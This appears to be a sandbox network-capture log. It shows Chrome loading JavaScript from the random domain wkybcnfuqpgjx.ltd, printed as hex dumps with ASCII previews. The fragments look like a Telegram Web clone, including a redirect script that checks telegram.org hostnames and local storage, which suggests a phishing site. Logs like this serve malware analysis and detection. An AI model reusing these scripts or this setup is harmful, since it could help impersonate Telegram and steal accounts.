                                  2025-01-12 00:03:41 UTC733INData Raw: 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 27 29 3b 0a 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 27 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 2e 2f 75 6e 73 75 70 70 6f 72 74 65 64 2e 70 6e 67 3e 3c 68 33 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 6e 6f 74 20 73 75
                                  Data Ascii: ica, sans-serif;'); document.body.innerHTML = '<table style="width:100%;height:100%;border-collapse:collapse"><tr><td style="vertical-align:middle;text-align:center"><div style="display:inline-block"><img src=./unsupported.png><h3>Your browser is not su
                                  2025-01-12 00:03:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.649741172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:41 UTC547OUTGET /main.d54bfa037348b154a941.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:41 UTC924INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:41 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840af-48637"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 2795
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tBjxSqtn1nXPp6WH5abl4uoZ9t8VHhLQPD3alQCe2EI5nKq4B%2Fv4m3lbofM%2FpSLFcB6Hv9B5uFOl3hQ2I0PeZo0T2ROEMq%2BwHUbOQuJqHgxp86EDg7u2cAF1Z8tPvsrRa0mlmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e289df06c34e-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1585&rtt_var=604&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1125&delivery_rate=1842271&cwnd=224&unsent_bytes=0&cid=0dfb54ac9e1fbc96&ts=161&x=0"
                                  2025-01-12 00:03:41 UTC445INData Raw: 37 63 64 62 0d 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 72 3d 7b 34 38 37 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 70 78 3a 28 29 3d 3e 4d 2c 65 5a 3a 28 29 3d 3e 4e 2c 41 72 3a 28 29 3d 3e 46 2c 50 48 3a 28 29 3d 3e 4f 2c 48 6e 3a 28 29 3d 3e 78 2c 52 75 3a 28 29 3d 3e 6b 2c 65 75 3a 28 29 3d 3e 4c 2c 69 42 3a 28 29 3d 3e 50 2c 66 6a 3a 28 29 3d 3e 54 7d 29 3b 76 61 72 20 6f 3d 6e 28 31 34 38 31 29 2c 72 3d 6e 28 31 31 38 32 29 2c 61 3d 6e 28 39 37 30 35 29 2c 73 3d 6e 28 34 34 38 37 29 2c 64 3d 6e 28 34 32 33 35 29 2c 69 3d 6e 28 37 38 33 36 29 2c 63 3d 6e 28 32 33 39 33 29 3b 63 6f 6e 73 74 20 75 3d 31 35 30 2c 6c 3d 35 65 33 2c 66 3d 6e 65 77 20 53 65 74 28 5b 22 64 65 73 74 72 6f
                                  Data Ascii: 7cdb(()=>{"use strict";var e,t,n,o,r={4875:(e,t,n)=>{n.d(t,{px:()=>M,eZ:()=>N,Ar:()=>F,PH:()=>O,Hn:()=>x,Ru:()=>k,eu:()=>L,iB:()=>P,fj:()=>T});var o=n(1481),r=n(1182),a=n(9705),s=n(4487),d=n(4235),i=n(7836),c=n(2393);const u=150,l=5e3,f=new Set(["destro
                                  2025-01-12 00:03:41 UTC1369INData Raw: 7d 29 29 3b 63 6f 6e 73 74 20 76 3d 63 2e 62 73 3f 6e 65 77 20 42 72 6f 61 64 63 61 73 74 43 68 61 6e 6e 65 6c 28 6f 2e 72 4c 46 29 3a 76 6f 69 64 20 30 2c 77 3d 28 30 2c 69 2e 46 65 29 28 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 67 3b 67 3d 5b 5d 2c 68 3f 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 7b 70 61 79 6c 6f 61 64 73 3a 65 7d 29 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 67 2e 70 75 73 68 28 65 29 2c 77 28 29 7d 6c 65 74 20 41 2c 53 3d 5b 5d 2c 45 3d 5b 5d 2c 49 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 41 3d 65 2c 62 3f 28 68 7c 7c 28 6f 2e 4f 69 67 26 26 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 3e 3e 3e 20 53 54 41 52 54 20 4c 4f 41 44 20 57 4f 52 4b 45 52 22 29 2c 68 3d 6e 65 77 20 57 6f 72 6b 65 72
                                  Data Ascii: }));const v=c.bs?new BroadcastChannel(o.rLF):void 0,w=(0,i.Fe)((()=>{const e=g;g=[],h?.postMessage({payloads:e})}));function C(e){g.push(e),w()}let A,S=[],E=[],I=!1;function k(e,t){return A=e,b?(h||(o.Oig&&console.log(">>> START LOAD WORKER"),h=new Worker
                                  2025-01-12 00:03:41 UTC1369INData Raw: 67 73 3a 65 7d 29 7d 28 74 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 2c 6e 29 7b 79 5b 65 5d 5b 74 5d 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 79 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 65 29 7b 72 65 74 75 72 6e 20 42 28 7b 74 79 70 65 3a 22 74 6f 67 67 6c 65 44 65 62 75 67 4d 6f 64 65 22 2c 69 73 45 6e 61 62 6c 65 64 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6e 3d 6e 65 77 20 41 72 72 61 79 28 74 3e 31 3f 74 2d 31 3a 30 29 2c 72 3d 31 3b 72 3c 74 3b 72 2b 2b 29 6e 5b 72 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 69 66 28 21 49 29 7b
                                  Data Ascii: gs:e})}(t),Promise.resolve())}function T(e,t,n){y[e][t]=n}function P(e){Object.assign(y,e)}function L(e){return B({type:"toggleDebugMode",isEnabled:e})}function N(e){for(var t=arguments.length,n=new Array(t>1?t-1:0),r=1;r<t;r++)n[r-1]=arguments[r];if(!I){
                                  2025-01-12 00:03:41 UTC1369INData Raw: 6f 6e 73 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 29 7b 6d 2e 67 65 74 28 65 2e 6d 65 73 73 61 67 65 49 64 29 3f 2e 63 61 6c 6c 62 61 63 6b 3f 2e 28 2e 2e 2e 65 2e 63 61 6c 6c 62 61 63 6b 41 72 67 73 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 63 6f 6e 73 74 20 74 3d 28 30 2c 64 2e 41 29 28 29 2c 6e 3d 7b 6d 65 73 73 61 67 65 49 64 3a 74 2c 2e 2e 2e 65 7d 2c 6f 3d 7b 6d 65 73 73 61 67 65 49 64 3a 74 7d 2c 72 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 28 65 2c 74 29 3d 3e 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6f 2c 7b 72 65 73 6f 6c 76 65 3a 65 2c 72 65 6a 65 63 74 3a 74 7d 29 7d 29 29 3b 69 66 28 22 61 72 67 73 22 69 6e 20 6e 26 26 22 6e 61 6d 65 22 69 6e 20 6e 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 2e 61 72 67
                                  Data Ascii: onse))}function O(e){m.get(e.messageId)?.callback?.(...e.callbackArgs)}function B(e){const t=(0,d.A)(),n={messageId:t,...e},o={messageId:t},r=new Promise(((e,t)=>{Object.assign(o,{resolve:e,reject:t})}));if("args"in n&&"name"in n&&"function"==typeof n.arg
                                  2025-01-12 00:03:41 UTC1369INData Raw: 6e 74 69 6f 6e 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 4d 65 6e 74 69 6f 6e 22 2c 65 2e 50 68 6f 6e 65 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 50 68 6f 6e 65 22 2c 65 2e 50 72 65 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 50 72 65 22 2c 65 2e 53 74 72 69 6b 65 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 53 74 72 69 6b 65 22 2c 65 2e 54 65 78 74 55 72 6c 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 54 65 78 74 55 72 6c 22 2c 65 2e 55 72 6c 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 55 72 6c 22 2c 65 2e 55 6e 64 65 72 6c 69 6e 65 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 55 6e 64 65 72 6c 69 6e 65 22 2c 65 2e 53 70 6f 69 6c 65 72 3d 22 4d 65 73 73 61 67 65 45 6e 74 69 74 79 53 70 6f 69 6c 65 72 22 2c 65 2e 43 75 73 74 6f 6d 45 6d 6f 6a 69
                                  Data Ascii: ntion="MessageEntityMention",e.Phone="MessageEntityPhone",e.Pre="MessageEntityPre",e.Strike="MessageEntityStrike",e.TextUrl="MessageEntityTextUrl",e.Url="MessageEntityUrl",e.Underline="MessageEntityUnderline",e.Spoiler="MessageEntitySpoiler",e.CustomEmoji
                                  2025-01-12 00:03:41 UTC1369INData Raw: 2c 5b 73 65 2c 64 65 2c 69 65 5d 3d 28 30 2c 67 2e 41 29 28 21 28 30 2c 6f 2e 4f 56 29 28 29 7c 7c 61 65 29 3b 28 30 2c 79 2e 41 79 29 28 69 65 2c 64 65 2c 61 65 29 2c 28 30 2c 6f 2e 76 4a 29 28 28 28 29 3d 3e 7b 61 65 26 26 64 65 28 29 7d 29 2c 5b 61 65 5d 29 2c 28 30 2c 45 2e 41 29 28 28 28 29 3d 3e 7b 69 66 28 55 26 26 21 5a 29 7b 63 6f 6e 73 74 7b 72 3a 65 2c 67 3a 74 2c 62 3a 6e 7d 3d 28 30 2c 66 2e 45 32 29 28 55 29 3b 72 65 2e 63 75 72 72 65 6e 74 3d 5b 65 2c 74 2c 6e 5d 7d 65 6c 73 65 20 72 65 2e 63 75 72 72 65 6e 74 3d 76 6f 69 64 20 30 7d 29 2c 5b 55 2c 5a 5d 29 3b 63 6f 6e 73 74 20 63 65 3d 28 30 2c 6f 2e 6c 69 29 28 21 31 29 3b 28 30 2c 6f 2e 5f 57 29 28 28 28 29 3d 3e 7b 63 65 2e 63 75 72 72 65 6e 74 3d 21 30 7d 29 29 3b 63 6f 6e 73 74 20 75
                                  Data Ascii: ,[se,de,ie]=(0,g.A)(!(0,o.OV)()||ae);(0,y.Ay)(ie,de,ae),(0,o.vJ)((()=>{ae&&de()}),[ae]),(0,E.A)((()=>{if(U&&!Z){const{r:e,g:t,b:n}=(0,f.E2)(U);re.current=[e,t,n]}else re.current=void 0}),[U,Z]);const ce=(0,o.li)(!1);(0,o._W)((()=>{ce.current=!0}));const u
                                  2025-01-12 00:03:41 UTC1369INData Raw: 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3b 63 6f 6e 73 74 20 72 3d 28 30 2c 62 2e 41 29 28 65 29 2c 61 3d 28 30 2c 62 2e 41 29 28 74 29 3b 28 30 2c 6f 2e 76 4a 29 28 28 28 29 3d 3e 7b 69 66 28 21 6e 29 72 65 74 75 72 6e 20 77 2e 61 64 64 43 61 6c 6c 62 61 63 6b 28 72 29 2c 43 2e 61 64 64 43 61 6c 6c 62 61 63 6b 28 61 29 2c 28 29 3d 3e 7b 43 2e 72 65 6d 6f 76 65 43 61 6c 6c 62 61 63 6b 28 61 29 2c 77 2e 72 65 6d 6f 76 65 43 61 6c 6c 62 61 63 6b 28 72 29 7d 7d 29 2c 5b 6e 2c 72 2c 61 5d 29 7d 28 6d 65 2c 66 65 2c 21 74 65 7c 7c 5f 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e
                                  Data Ascii: d 0!==arguments[2]&&arguments[2];const r=(0,b.A)(e),a=(0,b.A)(t);(0,o.vJ)((()=>{if(!n)return w.addCallback(r),C.addCallback(a),()=>{C.removeCallback(a),w.removeCallback(r)}}),[n,r,a])}(me,fe,!te||_),function(e,t){let n=arguments.length>2&&void 0!==argumen
                                  2025-01-12 00:03:41 UTC1369INData Raw: 74 20 6e 3d 5b 5d 2c 6f 3d 5b 5d 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6c 65 74 20 61 2c 73 2c 63 2c 66 2c 70 2c 67 2c 79 2c 62 2c 76 2c 77 2c 43 2c 41 2c 53 3b 66 6f 72 28 61 3d 31 32 38 2c 63 3d 30 2c 66 3d 37 32 2c 70 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 2c 70 3c 30 26 26 28 70 3d 30 29 2c 67 3d 30 3b 67 3c 70 3b 2b 2b 67 29 7b 69 66 28 74 26 26 28 6f 5b 6e 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 67 29 2d 36 35 3c 32 36 29 2c 65 2e 63 68 61 72 43 6f 64 65 41 74 28 67 29 3e 3d 31 32 38 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 49 6c 6c 65 67 61 6c 20 69 6e 70 75 74 20 3e 3d 20 30 78 38 30 22 29 3b 6e 2e 70 75 73 68 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 67 29 29 7d 66 6f 72 28 79
                                  Data Ascii: t n=[],o=[],r=e.length;let a,s,c,f,p,g,y,b,v,w,C,A,S;for(a=128,c=0,f=72,p=e.lastIndexOf("-"),p<0&&(p=0),g=0;g<p;++g){if(t&&(o[n.length]=e.charCodeAt(g)-65<26),e.charCodeAt(g)>=128)throw new RangeError("Illegal input >= 0x80");n.push(e.charCodeAt(g))}for(y
                                  2025-01-12 00:03:41 UTC1369INData Raw: 74 29 7d 7d 63 6f 6e 73 74 20 77 3d 65 3d 3e 7b 6c 65 74 7b 75 72 6c 3a 74 2c 74 65 78 74 3a 6e 2c 63 6c 61 73 73 4e 61 6d 65 3a 73 2c 63 68 69 6c 64 72 65 6e 3a 64 2c 77 69 74 68 4e 6f 72 6d 61 6c 57 6f 72 64 42 72 65 61 6b 3a 69 2c 69 73 52 74 6c 3a 63 7d 3d 65 3b 63 6f 6e 73 74 7b 6f 70 65 6e 55 72 6c 3a 75 7d 3d 28 30 2c 72 2e 6b 6f 29 28 29 2c 6c 3d 64 7c 7c 6e 2c 66 3d 74 3d 3d 3d 6e 2c 68 3d 28 30 2c 62 2e 41 29 28 28 65 3d 3e 21 74 7c 7c 28 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 75 28 7b 75 72 6c 3a 74 2c 73 68 6f 75 6c 64 53 6b 69 70 4d 6f 64 61 6c 3a 66 7d 29 2c 21 31 29 29 29 3b 69 66 28 21 74 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 6d 3d 28 30 2c 67 2e 41 29 28 73 7c 7c 22 74 65 78 74 2d 65 6e 74 69 74 79 2d 6c 69 6e 6b 22
                                  Data Ascii: t)}}const w=e=>{let{url:t,text:n,className:s,children:d,withNormalWordBreak:i,isRtl:c}=e;const{openUrl:u}=(0,r.ko)(),l=d||n,f=t===n,h=(0,b.A)((e=>!t||(e.preventDefault(),u({url:t,shouldSkipModal:f}),!1)));if(!t)return;const m=(0,g.A)(s||"text-entity-link"
                                  2025-01-12 00:03:41 UTC1369INData Raw: 72 53 65 74 75 70 4d 6f 6e 6b 65 79 54 72 61 63 6b 69 6e 67 2e 65 62 35 61 37 61 36 66 31 36 36 66 62 37 35 38 39 63 31 32 2e 74 67 73 22 2c 53 3d 6e 2e 70 2b 22 52 65 61 64 54 69 6d 65 2e 30 31 35 64 36 65 36 66 37 33 66 37 36 38 66 31 65 39 66 65 2e 74 67 73 22 2c 45 3d 6e 2e 70 2b 22 52 65 70 6f 72 74 2e 34 61 35 64 64 61 30 32 32 37 65 61 38 36 66 36 66 61 35 65 2e 74 67 73 22 2c 49 3d 6e 2e 70 2b 22 43 6f 6e 67 72 61 74 75 6c 61 74 69 6f 6e 73 2e 62 36 36 32 33 62 38 65 66 63 36 66 65 64 65 63 39 64 33 33 2e 74 67 73 22 2c 6b 3d 6e 2e 70 2b 22 44 69 73 63 75 73 73 69 6f 6e 47 72 6f 75 70 73 44 75 63 6b 73 2e 39 65 61 34 35 33 64 31 62 65 39 64 31 62 30 65 65 37 37 61 2e 74 67 73 22 2c 54 3d 6e 2e 70 2b 22 45 78 70 65 72 69 6d 65 6e 74 61 6c 2e 34 33
                                  Data Ascii: rSetupMonkeyTracking.eb5a7a6f166fb7589c12.tgs",S=n.p+"ReadTime.015d6e6f73f768f1e9fe.tgs",E=n.p+"Report.4a5dda0227ea86f6fa5e.tgs",I=n.p+"Congratulations.b6623b8efc6fedec9d33.tgs",k=n.p+"DiscussionGroupsDucks.9ea453d1be9d1b0ee77a.tgs",T=n.p+"Experimental.43


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.649742172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:41 UTC352OUTGET /redirect.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:41 UTC923INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:41 GMT
                                  Content-Type: application/javascript
                                  Content-Length: 325
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-145"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 2795
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=enclh893397SDcQSy2X1GewQ1YDFCVFrCVwOI1zJmTRBQVr%2F%2Btx4K%2BsBhRwk%2Bv5iMrBHFQt52NA1UNF%2BSFcBzv%2BhdCdL%2FKa%2Brzat54wQZPmP%2BQ08C205Z3iXCXQWIHO7Hrzotw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e28a08df8cd7-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2303&min_rtt=1940&rtt_var=987&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=930&delivery_rate=1505154&cwnd=237&unsent_bytes=0&cid=6cde4997e13ba4c2&ts=138&x=0"
                                  2025-01-12 00:03:41 UTC325INData Raw: 63 6f 6e 73 74 20 7b 20 70 61 74 68 6e 61 6d 65 2c 20 68 6f 73 74 6e 61 6d 65 2c 20 68 72 65 66 20 7d 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3b 0a 0a 69 66 20 28 70 61 74 68 6e 61 6d 65 2e 73 74 61 72 74 73 57 69 74 68 28 27 2f 7a 27 29 29 20 7b 0a 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 68 72 65 66 2e 72 65 70 6c 61 63 65 28 27 2f 7a 27 2c 20 27 2f 61 27 29 3b 0a 7d 0a 0a 69 66 20 28 0a 20 20 28 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 77 65 62 61 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 27 20 7c 7c 20 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 77 65 62 7a 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 27 29 20 26 26 20 21 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 27 74 74 2d 67 6c 6f 62 61 6c
                                  Data Ascii: const { pathname, hostname, href } = window.location;if (pathname.startsWith('/z')) { window.location.href = href.replace('/z', '/a');}if ( (hostname === 'weba.telegram.org' || hostname === 'webz.telegram.org') && !localStorage.getItem('tt-global


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.649750172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:43 UTC354OUTGET /compatTest.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:43 UTC919INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:43 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840b0-9f0"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 2797
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5lzDU1VeOmy%2BUubGJDZj5nyYDj5PoBv8Gh4jSoExe9RUuCOybBU8O9XJ30IfGlVeJ5DgtfWYeB4CXxEUbmk53hNCMnta2YKx8uCB12O8LImpfKCPs60sNvGE2ok%2FI2scp7Jtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2943aaa433e-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1878&min_rtt=1649&rtt_var=782&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=932&delivery_rate=1770770&cwnd=249&unsent_bytes=0&cid=41c17b5b2cbf3d28&ts=145&x=0"
                                  2025-01-12 00:03:43 UTC450INData Raw: 39 66 30 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 6f 6d 70 61 74 54 65 73 74 28 29 20 7b 0a 20 20 76 61 72 20 68 61 73 50 72 6f 6d 69 73 65 20 3d 20 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 57 65 62 53 6f 63 6b 65 74 73 20 3d 20 74 79 70 65 6f 66 20 57 65 62 53 6f 63 6b 65 74 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 57 65 62 43 72 79 70 74 6f 20 3d 20 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 20 26 26 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 2e 73 75 62 74 6c 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 4f 62 6a 65 63 74 46 72 6f 6d 45 6e 74 72 69 65 73 20 3d 20 74 79 70 65 6f 66 20
                                  Data Ascii: 9f0function compatTest() { var hasPromise = typeof Promise !== 'undefined'; var hasWebSockets = typeof WebSocket !== 'undefined'; var hasWebCrypto = window.crypto && typeof window.crypto.subtle !== 'undefined'; var hasObjectFromEntries = typeof
                                  2025-01-12 00:03:43 UTC1369INData Raw: 61 73 49 6e 74 6c 20 3d 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 49 6e 74 6c 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 44 69 73 70 6c 61 79 4e 61 6d 65 73 20 3d 20 68 61 73 49 6e 74 6c 20 26 26 20 74 79 70 65 6f 66 20 49 6e 74 6c 2e 44 69 73 70 6c 61 79 4e 61 6d 65 73 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 50 6c 75 72 61 6c 52 75 6c 65 73 20 3d 20 68 61 73 49 6e 74 6c 20 26 26 20 74 79 70 65 6f 66 20 49 6e 74 6c 2e 50 6c 75 72 61 6c 52 75 6c 65 73 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 4e 75 6d 62 65 72 46 6f 72 6d 61 74 20 3d 20 68 61 73 49 6e 74 6c 20 26 26 20 74 79 70 65 6f 66 20 49 6e 74 6c 2e 4e 75 6d 62 65 72 46 6f 72 6d 61
                                  Data Ascii: asIntl = typeof window.Intl !== 'undefined'; var hasDisplayNames = hasIntl && typeof Intl.DisplayNames !== 'undefined'; var hasPluralRules = hasIntl && typeof Intl.PluralRules !== 'undefined'; var hasNumberFormat = hasIntl && typeof Intl.NumberForma
                                  2025-01-12 00:03:43 UTC732INData Raw: 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 27 29 3b 0a 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 27 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 2e 2f 75 6e 73 75 70 70 6f 72 74 65 64 2e 70 6e 67 3e 3c 68 33 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 6e 6f 74 20 73 75 70
                                  Data Ascii: ca, sans-serif;'); document.body.innerHTML = '<table style="width:100%;height:100%;border-collapse:collapse"><tr><td style="vertical-align:middle;text-align:center"><div style="display:inline-block"><img src=./unsupported.png><h3>Your browser is not sup
                                  2025-01-12 00:03:43 UTC5INData Raw: 30 0d 0a 0d 0a
